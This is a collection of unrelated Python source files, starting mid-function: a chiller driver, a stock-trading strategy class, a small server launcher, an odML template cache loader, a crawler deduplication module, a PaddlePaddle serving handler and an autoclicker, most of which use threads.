temperature if sensor == 0: return self.send(self.cmd.GET_TEMP_INT) # External sensor temperature if sensor == 1: return self.send(self.cmd.GET_TEMP_EXT) @in_simulation_device_returns(0) def get_temperature_setpoint(self, sensor: int = 0) -> float: """Reads the current temperature setpoint. Args: sensor (int): Specify which temperature probe the setpoint applies to. This device uses a shared setpoint for all temperature probes. Hence, this argument has no effect here. """ # Check which SP is currently active setpoint_active = self.get_active_setpoint() if setpoint_active == 0: return self.send(self.cmd.GET_TEMP_SP1) if setpoint_active == 1: return self.send(self.cmd.GET_TEMP_SP2) if setpoint_active == 2: return self.send(self.cmd.GET_TEMP_SP3) raise PLDeviceReplyError(f"Invalid active SP <{setpoint_active}> received from the device!") # FIXME this should be refactored with new background tasks functionality def ramp_temperature(self, end_temperature: float, time: float): """Ramps chiller temperature from the current temperature to the end_temperature over time. """ if self.is_idle(): self.logger.warning("Chiller is not running! Please start the chiller before ramping the temperature.") return # Get starting temperature start_temperature = self.get_temperature() # Temperature step, degrees per minute. Can be either positive or negative. ramp_step = (end_temperature - start_temperature) / time # Check if the value is sane # Upon manual testing, chiller was able to reliably ramp temperature to 40 °C over 900 minutes. # This gives approximately 0.044 °C/min step # 3 decimal places would be enough to minimize the error ramp_step = round(ramp_step, 3) if ramp_step > 5.0 or ramp_step < -2.0: self.logger.error("Ramp step <%s> °C/min is too steep to ramp reliably!", ramp_step) elif abs(ramp_step) < 0.05: self.logger.error("Ramp step <%s> °C/min is very low!", ramp_step) self.logger.debug("ramp_temperature()::calculated ramp from <%s> to <%s> over <%s> minutes; step - <%s> degrees/min", start_temperature, end_temperature, time, ramp_step) ramp_thread = threading.Thread(target=self._ramp_runner, args=(start_temperature, ramp_step, end_temperature), daemon=True) ramp_thread.start() return ramp_step def _ramp_runner(self, start: float, step: float, end: float): """Worker function that actually does the ramp. """ current_temperature = start + step self.logger.info("Ramp start.") while (step > 0 and current_temperature <= end) or (step < 0 and current_temperature >= end): self.logger.info("Ramping from %s to %s, current step <%s>, %s minutes left", start, end, current_temperature, abs(round(end - current_temperature))) self.set_temperature(current_temperature) # Calculate next value current_temperature = round(current_temperature + step, 2) sleep(60) self.logger.info("Ramp end.") # Set temperature to final value self.set_temperature(end) @in_simulation_device_returns(0) def get_cooling_power(self) -> int: """Returns the value of the chiller cooling power in % """ return abs(self.send(self.cmd.GET_MAX_COOL_PWR)) def set_cooling_power(self, cooling_power: int): """Sets the value of the chiller cooling power in % """ # According to manual, "Enter the value with a preceding negative sign!" cooling_power = -abs(cooling_power) self.send(self.cmd.SET_MAX_COOL_PWR, cooling_power) def get_heating_power(self) -> float: """Returns the current heating power in %. """ return self.send(self.cmd.GET_HEAT_PWR) def get_heating_power_setpoint(self) -> int: """Returns the value of the heating power setpoint in % """ return self.send(self.cmd.GET_MAX_HEAT_PWR) def set_heating_power(self, heating_power: int = 100): """Sets the heating power of the chiller, in percent [10-100%]. """ heating_power = abs(heating_power) self.send(self.cmd.SET_MAX_HEAT_PWR, heating_power) def set_recirculation_pump_speed(self, speed: int): """Sets the recirculation pump speed (4 different speeds allowed). """ self.send(self.cmd.SET_PUMP_SPEED, speed) def get_recirculation_pump_speed(self) -> int: """Returns the recirculation pump speed: 1 (low flow rate) --> 4 (high flow rate) """ return self.send(self.cmd.GET_PUMP_SPEED)
qastockbase.py
# """ stock_base """ import uuid import datetime import json import os import threading import pandas as pd import pymongo from qaenv import (eventmq_ip, eventmq_password, eventmq_port, eventmq_username, mongo_ip) import QUANTAXIS as QA from QUANTAXIS.QAARP import QA_Risk, QA_User from QUANTAXIS.QAEngine.QAThreadEngine import QA_Thread from QUANTAXIS.QAUtil.QAParameter import MARKET_TYPE, RUNNING_ENVIRONMENT, ORDER_DIRECTION from QAPUBSUB.consumer import subscriber_topic from QAPUBSUB.producer import publisher_routing from QAStrategy.qactabase import QAStrategyCTABase from QIFIAccount import QIFI_Account class QAStrategyStockBase(QAStrategyCTABase): def __init__(self, code=['000001'], frequence='1min', strategy_id='QA_STRATEGY', risk_check_gap=1, portfolio='default', start='2019-01-01', end='2019-10-21', data_host=eventmq_ip, data_port=eventmq_port, data_user=eventmq_username, data_password=eventmq_password, trade_host=eventmq_ip, trade_port=eventmq_port, trade_user=eventmq_username, trade_password=eventmq_password, taskid=None, mongo_ip=mongo_ip): super().__init__(code=code, frequence=frequence, strategy_id=strategy_id, risk_check_gap=risk_check_gap, portfolio=portfolio, start=start, end=end, data_host=eventmq_ip, data_port=eventmq_port, data_user=eventmq_username, data_password=eventmq_password, trade_host=eventmq_ip, trade_port=eventmq_port, trade_user=eventmq_username, trade_password=eventmq_password, taskid=taskid, mongo_ip=mongo_ip) self.code = code def subscribe_data(self, code, frequence, data_host, data_port, data_user, data_password): """[summary] Arguments: code {[type]} -- [description] frequence {[type]} -- [description] """ self.sub = subscriber_topic(exchange='realtime_stock_{}'.format( frequence), host=data_host, port=data_port, user=data_user, password=data_password, routing_key='') for item in code: self.sub.add_sub(exchange='realtime_stock_{}'.format( frequence), routing_key=item) self.sub.callback = self.callback def upcoming_data(self, new_bar): """upcoming_bar : Arguments: new_bar {json} -- [description] """ self._market_data = pd.concat([self._old_data, new_bar]) # QA.QA_util_log_info(self._market_data) if self.isupdate: self.update() self.isupdate = False self.update_account() # self.positions.on_price_change(float(new_bar['close'])) self.on_bar(new_bar) def ind2str(self, ind, ind_type): z = ind.tail(1).reset_index().to_dict(orient='records')[0] return json.dumps({'topic': ind_type, 'code': self.code, 'type': self.frequence, 'data': z}) def callback(self, a, b, c, body): """在strategy的callback中,我们需要的是 1. 更新数据 2. 更新bar 3. 更新策略状态 4. 推送事件 Arguments: a {[type]} -- [description] b {[type]} -- [description] c {[type]} -- [description] body {[type]} -- [description] """ self.new_data = json.loads(str(body, encoding='utf-8')) self.running_time = self.new_data['datetime'] if float(self.new_data['datetime'][-9:]) == 0: self.isupdate = True self.acc.on_price_change(self.new_data['code'], self.new_data['close']) bar = pd.DataFrame([self.new_data]).set_index(['datetime', 'code'] ).loc[:, ['open', 'high', 'low', 'close', 'volume']] self.upcoming_data(bar) def run_sim(self): self.running_mode = 'sim' self._old_data = QA.QA_fetch_stock_min(self.code, QA.QA_util_get_last_day( QA.QA_util_get_real_date(str(datetime.date.today()))), str(datetime.datetime.now()), format='pd', frequence=self.frequence).set_index(['datetime', 'code']) self._old_data = self._old_data.loc[:, [ 'open', 'high', 'low', 'close', 'volume']] self.database = pymongo.MongoClient(mongo_ip).QAREALTIME self.client = self.database.account self.subscriber_client = self.database.subscribe self.acc = QIFI_Account( username=self.strategy_id, password=self.strategy_id, trade_host=mongo_ip) self.acc.initial() self.pub = publisher_routing(exchange='QAORDER_ROUTER', host=self.trade_host, port=self.trade_port, user=self.trade_user, password=self.trade_password) self.subscribe_data(self.code, self.frequence, self.data_host, self.data_port, self.data_user, self.data_password) self.add_subscriber('oL-C4w1HjuPRqTIRcZUyYR0QcLzo') self.database.strategy_schedule.job_control.update( {'strategy_id': self.strategy_id}, {'strategy_id': self.strategy_id, 'taskid': self.taskid, 'filepath': os.path.abspath(__file__), 'status': 200}, upsert=True) # threading.Thread(target=, daemon=True).start() self.sub.start() def run(self): while True: pass def get_code_marketdata(self, code): return self.market_data.loc[(slice(None), code),:] def get_current_marketdata(self): return self.market_data.loc[(self.running_time, slice(None)),:] def debug(self): self.running_mode = 'backtest' self.database = pymongo.MongoClient(mongo_ip).QUANTAXIS user = QA_User(username="admin", password='admin') port = user.new_portfolio(self.portfolio) self.acc = port.new_accountpro( account_cookie=self.strategy_id, init_cash=self.init_cash, market_type=self.market_type) #self.positions = self.acc.get_position(self.code) print(self.acc) print(self.acc.market_type) data = QA.QA_quotation(self.code, self.start, self.end, source=QA.DATASOURCE.MONGO, frequence=self.frequence, market=self.market_type, output=QA.OUTPUT_FORMAT.DATASTRUCT) def x1(item): # print(data) self._on_1min_bar() self._market_data.append(item) if str(item.name[0])[0:10] != str(self.running_time)[0:10]: if self.market_type == QA.MARKET_TYPE.STOCK_CN: print('backtest: Settle!') self.acc.settle() self.running_time = str(item.name[0]) self.on_bar(item) data.data.apply(x1, axis=1) def update_account(self): if self.running_mode == 'sim': QA.QA_util_log_info('{} UPDATE ACCOUNT'.format( str(datetime.datetime.now()))) self.accounts = self.acc.account_msg self.orders = self.acc.orders self.positions = self.acc.positions self.trades = self.acc.trades self.updatetime = self.acc.dtstr elif self.running_mode == 'backtest': #self.positions = self.acc.get_position(self.code) self.positions = self.acc.positions def send_order(self, direction='BUY', offset='OPEN', code=None, price=3925, volume=10, order_id='',): towards = eval('ORDER_DIRECTION.{}_{}'.format(direction, offset)) order_id = str(uuid.uuid4()) if order_id == '' else order_id if self.market_type == QA.MARKET_TYPE.STOCK_CN: """ 在此对于股票的部分做一些转换 """ if towards == ORDER_DIRECTION.SELL_CLOSE: towards = ORDER_DIRECTION.SELL elif towards == ORDER_DIRECTION.BUY_OPEN: towards = ORDER_DIRECTION.BUY if isinstance(price, float): pass elif isinstance(price, pd.Series): price = price.values[0] if self.running_mode == 'sim': QA.QA_util_log_info( '============ {} SEND ORDER =================='.format(order_id)) QA.QA_util_log_info('direction{} offset {} price{} volume{}'.format( direction, offset, price, volume)) if self.check_order(direction, offset): self.last_order_towards = {'BUY': '', 'SELL': ''} self.last_order_towards[direction] = offset now = str(datetime.datetime.now()) order = self.acc.send_order( code=code, towards=towards, price=price, amount=volume, order_id=order_id) order['topic'] = 'send_order' self.pub.pub( json.dumps(order), routing_key=self.strategy_id) self.acc.make_deal(order) self.bar_order['{}_{}'.format(direction, offset)] = self.bar_id try: for user in self.subscriber_list: QA.QA_util_log_info(self.subscriber_list) "oL-C4w2WlfyZ1vHSAHLXb2gvqiMI" """http://www.yutiansut.com/signal?user_id=oL-C4w1HjuPRqTIRcZUyYR0QcLzo&template=xiadan_report&\ strategy_id=test1&realaccount=133496&code=rb1910&order_direction=BUY&\ order_offset=OPEN&price=3600&volume=1&order_time=20190909 """ requests.post('http://www.yutiansut.com/signal?user_id={}&template={}&strategy_id={}&realaccount={}&code={}&order_direction={}&order_offset={}&price={}&volume={}&order_time={}'.format( user, "xiadan_report", self.strategy_id, self.acc.user_id, self.code.lower(), direction, offset, price, volume, now)) except Exception as e: QA.QA_util_log_info(e) else: QA.QA_util_log_info('failed in ORDER_CHECK') elif self.running_mode == 'backtest': self.bar_order['{}_{}'.format(direction, offset)] = self.bar_id self.acc.receive_simpledeal( code=code, trade_time=self.running_time, trade_towards=towards, trade_amount=volume, trade_price=price, order_id=order_id) #self.positions = self.acc.get_position(self.code) if __name__ == '__main__': QAStrategyStockBase(code=['000001', '000002']).run_sim()
server.py
# encoding: utf-8 from src.color import colored import socket import sys from src.Server import Server def header_program(): title = "|\t\t-~=[ BlackSkull ]=~-\t\t|" title = title.replace('\t', ' ') bar = '+' + (len(title) - 2) * "=" + '+' bar_light = '+' + (len(title) - 2) * "-" + '+' break_line = '|' + (len(title) - 2) * " " + '|' print(bar) print(title) print(bar) print(break_line) print("| Developed by: Douglas A. <alves.douglaz@gmail.com> |") print("| Version: 1.0.3 |") print(break_line) print(bar_light) print(colored("\n\n[] Server initialized...\n\n", 'green', attrs=['bold', 'reverse'])) def create_workers(): """ Create worker threads (will die when main exits) """ server = MultiServer() server.register_signal_handler() for _ in range(NUMBER_OF_THREADS): t = threading.Thread(target=work, args=(server,)) t.daemon = True t.start() return def main(): header_program() server = Server() server.start() if __name__ == '__main__': main()
templates.py
""" Handles (deferred) loading of odML templates """ import os import sys import tempfile import threading try: import urllib.request as urllib2 from urllib.error import URLError from urllib.parse import urljoin except ImportError: import urllib2 from urllib2 import URLError from urlparse import urljoin from datetime import datetime as dati from datetime import timedelta from hashlib import md5 from .tools.parser_utils import ParserException from .tools.xmlparser import XMLReader REPOSITORY_BASE = 'https://templates.g-node.org/' REPOSITORY = urljoin(REPOSITORY_BASE, 'templates.xml') CACHE_AGE = timedelta(days=1) CACHE_DIR = "odml.cache" # TODO after prototyping move functions common with # terminologies to a common file. def cache_load(url): """ Load the url and store the file in a temporary cache directory. Subsequent requests for this url will use the cached version until the file is older than the CACHE_AGE. Exceptions are caught and not re-raised to enable loading of nested odML files without breaking if one of the child files is unavailable. :param url: location of an odML template XML file. :return: Local file location of the requested file. """ filename = '.'.join([md5(url.encode()).hexdigest(), os.path.basename(url)]) cache_dir = os.path.join(tempfile.gettempdir(), CACHE_DIR) # Create temporary folder if required if not os.path.exists(cache_dir): try: os.makedirs(cache_dir) except OSError: # might happen due to concurrency if not os.path.exists(cache_dir): raise cache_file = os.path.join(cache_dir, filename) if not os.path.exists(cache_file) or dati.fromtimestamp(os.path.getmtime(cache_file)) < (dati.now() - CACHE_AGE): try: data = urllib2.urlopen(url).read() if sys.version_info.major > 2: data = data.decode("utf-8") except (ValueError, URLError) as exc: msg = "Failed to load resource from '%s': %s" % (url, exc) exc.args = (msg,) # needs to be a tuple raise exc with open(cache_file, "w") as local_file: local_file.write(str(data)) return cache_file class TemplateHandler(dict): """ TemplateHandler facilitates synchronous and deferred loading, caching, browsing and importing of full or partial odML templates. """ # Used for deferred loading loading = {} def browse(self, url): """ Load, cache and pretty print an odML template XML file from a URL. :param url: location of an odML template XML file. :return: The odML document loaded from url. """ doc = self.load(url) if not doc: raise ValueError("Failed to load resource from '%s'" % url) doc.pprint(max_depth=0) return doc def clone_section(self, url, section_name, children=True, keep_id=False): """ Load a section by name from an odML template found at the provided URL and return a clone. By default it will return a clone with all child sections and properties as well as changed IDs for every entity. The named section has to be a root (direct) child of the referenced odML document. :param url: location of an odML template XML file. :param section_name: Unique name of the requested Section. :param children: Boolean whether the child entities of a Section will be returned as well. Default is True. :param keep_id: Boolean whether all returned entities will keep the original ID or have a new one assigned. Default is False. :return: The cloned odML section loaded from url. """ doc = self.load(url) if not doc: raise ValueError("Failed to load resource from '%s'" % url) try: sec = doc[section_name] except KeyError: raise KeyError("Section '%s' not found in document at '%s'" % (section_name, url)) return sec.clone(children=children, keep_id=keep_id) def load(self, url): """ Load and cache an odML template from a URL. :param url: location of an odML template XML file. :return: The odML document loaded from url. """ # Some feedback for the user when loading large or # nested (include) odML files. print("\nLoading file %s" % url) if url in self: doc = self[url] elif url in self.loading: self.loading[url].join() self.loading.pop(url, None) doc = self.load(url) else: doc = self._load(url) return doc def _load(self, url): """ Cache loads an odML template for a URL and returns the result as a parsed odML document. :param url: location of an odML template XML file. :return: The odML document loaded from url. It will silently return None, if any exceptions occur to enable loading of nested odML files. """ try: local_file = cache_load(url) except (ValueError, URLError): return None try: doc = XMLReader(filename=url, ignore_errors=True).from_file(local_file) doc.finalize() except ParserException as exc: print("Failed to load '%s' due to parser errors:\n %s" % (url, exc)) return None self[url] = doc return doc def deferred_load(self, url): """ Start a background thread to load an odML template from a URL. :param url: location of an odML template XML file. """ if url in self or url in self.loading: return self.loading[url] = threading.Thread(target=self._load, args=(url,)) self.loading[url].start()
due.py
#!/usr/bin/env python import os import cPickle import logging import Queue import shelve import time from threading import Lock, Thread class MemoryDue(object): def __init__(self, params): self._db = {} self._check_lock = Lock() self.receiver = None def put(self, r): """ set receiver before calling put """ is_new = False self._check_lock.acquire() try: if r.md5 in self._db: # also compare batch old_batch = int(self._db[r.md5]) new_batch = r.batch if new_batch > old_batch: is_new = True else: is_new = False else: is_new = True if is_new: self._db[r.md5] = r.batch finally: self._check_lock.release() # for performance reason, the following code is outside above critical section if is_new: self.receiver.put(r) class DiskDue(MemoryDue): def __init__(self, params): db_file = params[0] self._check_lock = Lock() dir = os.path.dirname(db_file) if not os.path.exists(dir): os.makedirs(dir) self._db = shelve.open(db_file, 'c') self.receiver = None class MercatorDue(object): def __init__(self, params): # disk file self.due_dir = params[0] if not os.path.exists(self.due_dir): os.makedirs(self.due_dir) self.file_version = 0 # buffer self._buffer = {} self._buffer_size_limit = int(params[1]) self._check_lock = Lock() self._merge_lock = Lock() self.receiver = None # state self.no_merge_yet = True # protected by _check_lock # statistics self.input_count = 0 # protected by _check_lock self.buffer_hit_count = 0 # protected by _check_lock self.disk_hit_count = 0 # protected by _merge_lock self.passed_count = 0 # protected by _check_lock (no_merge_yet=True) and by _merge_lock (no_merge_yet=False) self.keep_file = False def __str__(self): #buffer_pct = float(len(self._buffer)) / float(self._buffer_size_limit) * 100.0 if self._merge_lock.locked(): status_str = '!' else: status_str = '' return 'MercatorDue%s -- Merges:%d Buffer:%d/%d\n\tInput:%d BufferHit:%d DiskHit:%d Passed:%d' % ( status_str, self.file_version, len(self._buffer), self._buffer_size_limit, self.input_count, self.buffer_hit_count, self.disk_hit_count, self.passed_count ) def put(self, r): logging.debug('> %s.%d' % (r.md5, r.batch)) self._check_lock.acquire() try: self.input_count += 1 r.sent = False # first check LRU cache # then check buffer if r.md5 in self._buffer and self._buffer[r.md5].batch >= r.batch: # it's a dup self.buffer_hit_count += 1 return else: # immediately forward when no_merge_yet = True # it will not be forwarded again during merging if self.no_merge_yet: self.forward(r) if r.md5 in self._buffer: # same md5, but later one has larger batch # and will replace the previous one # if it was not forwarded already, it should be considered as a buffer hit if not self._buffer[r.md5].sent: self.buffer_hit_count += 1 # add new resource or replace the same one with smaller batch self._buffer[r.md5] = r # when buffer is full, merge buffer to disk file and forward unique URLs if len(self._buffer) >= self._buffer_size_limit: # block when the previous merging is not done yet while self._merge_lock.locked(): logging.debug('...') time.sleep(1) self.packing_for_merge() finally: self._check_lock.release() def forward(self, r): """ forward passed resource should be protected by a Lock since it increment passed_count """ if not r.sent: self.receiver.put(r) self.passed_count += 1 r.sent = True # make sure it will not be forwarded more than once def notify_idle(self): """ called when the system is idling """ self._check_lock.acquire() try: if len(self._buffer) > 0: # skip when previous merging is not done yet if self._merge_lock.locked(): return self.packing_for_merge() finally: self._check_lock.release() def packing_for_merge(self): """ make sure this method is protected by self._check_lock """ self.no_merge_yet = False # sort buffer by md5 buffer_keys = self._buffer.keys() buffer_keys.sort() # make a sorted copy of the buffer buffer_to_merge = Queue.Queue(0) for k in buffer_keys: buffer_to_merge.put(self._buffer[k], block=False) # use another thread to do the merging t = Thread(target=self.merge_check, args=[buffer_to_merge]) t.start() # create an new empty buffer self._buffer = {} def merge_check(self, buffer_to_merge): self._merge_lock.acquire() logging.debug('*'*40) try: from_file_path = os.path.join(self.due_dir, 'data.%d' % self.file_version) self.file_version += 1 to_file_path = os.path.join(self.due_dir, 'data.%d' % self.file_version) if not os.path.exists(from_file_path): # create an empty file from_file = open(from_file_path, 'w') from_file.close() from_file = open(from_file_path, 'r') to_file = open(to_file_path, 'w') # buffer used to load from disk file disk_input_buffer = Queue.Queue(self._buffer_size_limit) # buffer used to dump to disk file disk_output_buffer = Queue.Queue(self._buffer_size_limit) def get_left(from_file, disk_input_buffer): # if input buffer is empty, try to fill it if disk_input_buffer.empty(): try: pairs = cPickle.load(from_file) except EOFError: return None, None except: logging.exception('Fail to load in merge_check:') return None, None else: for (md5, batch) in pairs: disk_input_buffer.put((md5, batch), block=False) if not disk_input_buffer.empty(): md5, batch = disk_input_buffer.get(block=False) return md5, batch else: logging.error('[BUG] [due.py merge_check()] disk_input_buffer should not be empty here') return None, None def get_right(buffer_to_merge): try: r = buffer_to_merge.get(block=False) except Queue.Empty: r = None return r def dump_record(md5, batch, to_file, disk_output_buffer): if disk_output_buffer.full(): clear_output_buffer(to_file, disk_output_buffer) # add to buffer disk_output_buffer.put((md5, batch), block=False) def clear_output_buffer(to_file, disk_output_buffer): out_pairs = [] while not disk_output_buffer.empty(): out_pairs.append(disk_output_buffer.get(block=False)) cPickle.dump(out_pairs, to_file) md51, batch1 = get_left(from_file, disk_input_buffer) r2 = get_right(buffer_to_merge) while md51 is not None and r2 is not None: if md51 == r2.md5: if r2.batch > batch1: # it's new dump_record(r2.md5, r2.batch, to_file, disk_output_buffer) self.forward(r2) else: # it's dup dump_record(md51, batch1, to_file, disk_output_buffer) self.disk_hit_count += 1 md51, batch1 = get_left(from_file, disk_input_buffer) r2 = get_right(buffer_to_merge) elif md51 < r2.md5: # output left dump_record(md51, batch1, to_file, disk_output_buffer) md51, batch1 = get_left(from_file, disk_input_buffer) else: # output and forward r2 dump_record(r2.md5, r2.batch, to_file, disk_output_buffer) self.forward(r2) r2 = get_right(buffer_to_merge) # output the rest while md51 is not None: dump_record(md51, batch1, to_file, disk_output_buffer) md51, batch1 = get_left(from_file, disk_input_buffer) while r2 is not None: dump_record(r2.md5, r2.batch, to_file, disk_output_buffer) self.forward(r2) r2 = get_right(buffer_to_merge) # clear output buffer clear_output_buffer(to_file, disk_output_buffer) from_file.close() to_file.close() # remove from_file if not self.keep_file: os.remove(from_file_path) logging.debug('-'*40) finally: self._merge_lock.release()
local_service_handler.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. import os import logging import multiprocessing from .error_catch import ErrorCatch, CustomException, CustomExceptionCode #from paddle_serving_server import OpMaker, OpSeqMaker #from paddle_serving_server import Server as GpuServer #from paddle_serving_server import Server as CpuServer from . import util #from paddle_serving_app.local_predict import LocalPredictor _LOGGER = logging.getLogger(__name__) _workdir_name_gen = util.NameGenerator("workdir_") class LocalServiceHandler(object): """ LocalServiceHandler is the processor of the local service, contains three client types, brpc, grpc and local_predictor.If you use the brpc or grpc, serveing startup ability is provided.If you use local_predictor, local predict ability is provided by paddle_serving_app. """ def __init__(self, model_config, client_type='local_predictor', workdir="", thread_num=2, device_type=-1, devices="", fetch_names=None, mem_optim=True, ir_optim=False, available_port_generator=None, use_profile=False, precision="fp32", use_mkldnn=False, mkldnn_cache_capacity=0, mkldnn_op_list=None, mkldnn_bf16_op_list=None): """ Initialization of localservicehandler Args: model_config: model config path client_type: brpc, grpc and local_predictor[default] workdir: work directory thread_num: number of threads, concurrent quantity. device_type: support multiple devices. -1=Not set, determined by `devices`. 0=cpu, 1=gpu, 2=tensorRT, 3=arm cpu, 4=kunlun xpu devices: gpu id list[gpu], "" default[cpu] fetch_names: get fetch names out of LocalServiceHandler in local_predictor mode. fetch_names_ is compatible for Client(). mem_optim: use memory/graphics memory optimization, True default. ir_optim: use calculation chart optimization, False default. available_port_generator: generate available ports use_profile: use profiling, False default. precision: inference precesion, e.g. "fp32", "fp16", "int8" use_mkldnn: use mkldnn, default False. mkldnn_cache_capacity: cache capacity of mkldnn, 0 means no limit. mkldnn_op_list: OP list optimized by mkldnn, None default. mkldnn_bf16_op_list: OP list optimized by mkldnn bf16, None default. Returns: None """ if available_port_generator is None: available_port_generator = util.GetAvailablePortGenerator() self._model_config = model_config self._port_list = [] self._device_name = "cpu" self._use_gpu = False self._use_trt = False self._use_lite = False self._use_xpu = False self._use_ascend_cl = False self._use_mkldnn = False self._mkldnn_cache_capacity = 0 self._mkldnn_op_list = None self._mkldnn_bf16_op_list = None if device_type == -1: # device_type is not set, determined by `devices`, if devices == "": # CPU self._device_name = "cpu" devices = [-1] else: # GPU self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] elif device_type == 0: # CPU self._device_name = "cpu" devices = [-1] elif device_type == 1: # GPU self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] elif device_type == 2: # Nvidia Tensor RT self._device_name = "gpu" self._use_gpu = True devices = [int(x) for x in devices.split(",")] self._use_trt = True elif device_type == 3: # ARM CPU self._device_name = "arm" devices = [-1] self._use_lite = True elif device_type == 4: # Kunlun XPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_lite = True self._use_xpu = True elif device_type == 5: # Ascend 310 ARM CPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_lite = True self._use_ascend_cl = True elif device_type == 6: # Ascend 910 ARM CPU self._device_name = "arm" devices = [int(x) for x in devices.split(",")] self._use_ascend_cl = True else: _LOGGER.error( "LocalServiceHandler initialization fail. device_type={}" .format(device_type)) if client_type == "brpc" or client_type == "grpc": for _ in devices: self._port_list.append(available_port_generator.next()) _LOGGER.info("Create ports for devices:{}. Port:{}" .format(devices, self._port_list)) self._client_type = client_type self._workdir = workdir self._devices = devices self._thread_num = thread_num self._mem_optim = mem_optim self._ir_optim = ir_optim self._local_predictor_client = None self._rpc_service_list = [] self._server_pros = [] self._use_profile = use_profile self._fetch_names = fetch_names self._precision = precision self._use_mkldnn = use_mkldnn self._mkldnn_cache_capacity = mkldnn_cache_capacity self._mkldnn_op_list = mkldnn_op_list self._mkldnn_bf16_op_list = mkldnn_bf16_op_list _LOGGER.info( "Models({}) will be launched by device {}. use_gpu:{}, " "use_trt:{}, use_lite:{}, use_xpu:{}, device_type:{}, devices:{}, " "mem_optim:{}, ir_optim:{}, use_profile:{}, thread_num:{}, " "client_type:{}, fetch_names:{}, precision:{}, use_mkldnn:{}, " "mkldnn_cache_capacity:{}, mkldnn_op_list:{}, " "mkldnn_bf16_op_list:{}, use_ascend_cl:{}".format( model_config, self._device_name, self._use_gpu, self._use_trt, self._use_lite, self._use_xpu, device_type, self._devices, self._mem_optim, self._ir_optim, self._use_profile, self._thread_num, self._client_type, self._fetch_names, self._precision, self._use_mkldnn, self._mkldnn_cache_capacity, self._mkldnn_op_list, self._mkldnn_bf16_op_list, self._use_ascend_cl)) def get_fetch_list(self): return self._fetch_names def get_port_list(self): return self._port_list def get_client(self, concurrency_idx): """ Function get_client is only used for local predictor case, creates one LocalPredictor object, and initializes the paddle predictor by function load_model_config.The concurrency_idx is used to select running devices. Args: concurrency_idx: process/thread index Returns: _local_predictor_client """ #checking the legality of concurrency_idx. device_num = len(self._devices) if device_num <= 0: _LOGGER.error("device_num must be not greater than 0. devices({})". format(self._devices)) raise ValueError("The number of self._devices error") if concurrency_idx < 0: _LOGGER.error("concurrency_idx({}) must be one positive number". format(concurrency_idx)) concurrency_idx = 0 elif concurrency_idx >= device_num: concurrency_idx = concurrency_idx % device_num _LOGGER.info("GET_CLIENT : concurrency_idx={}, device_num={}".format( concurrency_idx, device_num)) from paddle_serving_app.local_predict import LocalPredictor if self._local_predictor_client is None: self._local_predictor_client = LocalPredictor() # load model config and init predictor self._local_predictor_client.load_model_config( model_path=self._model_config, use_gpu=self._use_gpu, gpu_id=self._devices[concurrency_idx], use_profile=self._use_profile, thread_num=self._thread_num, mem_optim=self._mem_optim, ir_optim=self._ir_optim, use_trt=self._use_trt, use_lite=self._use_lite, use_xpu=self._use_xpu, precision=self._precision, use_mkldnn=self._use_mkldnn, mkldnn_cache_capacity=self._mkldnn_cache_capacity, mkldnn_op_list=self._mkldnn_op_list, mkldnn_bf16_op_list=self._mkldnn_bf16_op_list, use_ascend_cl=self._use_ascend_cl) return self._local_predictor_client def get_client_config(self): return os.path.join(self._model_config, "serving_server_conf.prototxt") def _prepare_one_server(self, workdir, port, gpuid, thread_num, mem_optim, ir_optim, precision): """ According to self._device_name, generating one Cpu/Gpu/Arm Server, and setting the model config amd startup params. Args: workdir: work directory port: network port gpuid: gpu id thread_num: thread num mem_optim: use memory/graphics memory optimization ir_optim: use calculation chart optimization precision: inference precison, e.g."fp32", "fp16", "int8" Returns: server: CpuServer/GpuServer """ if self._device_name == "cpu": from paddle_serving_server import OpMaker, OpSeqMaker, Server op_maker = OpMaker() read_op = op_maker.create('general_reader') general_infer_op = op_maker.create('general_infer') general_response_op = op_maker.create('general_response') op_seq_maker = OpSeqMaker() op_seq_maker.add_op(read_op) op_seq_maker.add_op(general_infer_op) op_seq_maker.add_op(general_response_op) server = Server() else: #gpu or arm from paddle_serving_server import OpMaker, OpSeqMaker, Server op_maker = OpMaker() read_op = op_maker.create('general_reader') general_infer_op = op_maker.create('general_infer') general_response_op = op_maker.create('general_response') op_seq_maker = OpSeqMaker() op_seq_maker.add_op(read_op) op_seq_maker.add_op(general_infer_op) op_seq_maker.add_op(general_response_op) server = Server() if gpuid >= 0: server.set_gpuid(gpuid) # TODO: support arm or arm + xpu later server.set_device(self._device_name) if self._use_xpu: server.set_xpu() if self._use_lite: server.set_lite() if self._use_ascend_cl: server.set_ascend_cl() server.set_op_sequence(op_seq_maker.get_op_sequence()) server.set_num_threads(thread_num) server.set_memory_optimize(mem_optim) server.set_ir_optimize(ir_optim) server.set_precision(precision) server.load_model_config(self._model_config) server.prepare_server( workdir=workdir, port=port, device=self._device_name) if self._fetch_names is None: self._fetch_names = server.get_fetch_list() return server def _start_one_server(self, service_idx): """ Start one server Args: service_idx: server index Returns: None """ self._rpc_service_list[service_idx].run_server() def prepare_server(self): """ Prepare all servers to be started, and append them into list. """ for i, device_id in enumerate(self._devices): if self._workdir != "": workdir = "{}_{}".format(self._workdir, i) else: workdir = _workdir_name_gen.next() self._rpc_service_list.append( self._prepare_one_server( workdir, self._port_list[i], device_id, thread_num=self._thread_num, mem_optim=self._mem_optim, ir_optim=self._ir_optim, precision=self._precision)) def start_server(self): """ Start multiple processes and start one server in each process """ for i, _ in enumerate(self._rpc_service_list): p = multiprocessing.Process( target=self._start_one_server, args=(i, )) p.daemon = True self._server_pros.append(p) for p in self._server_pros: p.start()
main.py
''' ################################### # PYTHON AUTOCLICKER # # BY Divdude77 # ################################### ''' ############################################# # READ readme.md BEFORE RUNNING THIS SCRIPT # ############################################# import pyautogui import keyboard import threading import time # Key which activates autoclicker key = "v" def clickthread(): pyautogui.click() print("Autoclicker Initiated!") while True: if keyboard.is_pressed(key): while keyboard.is_pressed(key): time.sleep(0) # Delay between each click (0 -> Fastest clicking) x = threading.Thread(target=clickthread) x.start()
cancel_delay_test.py
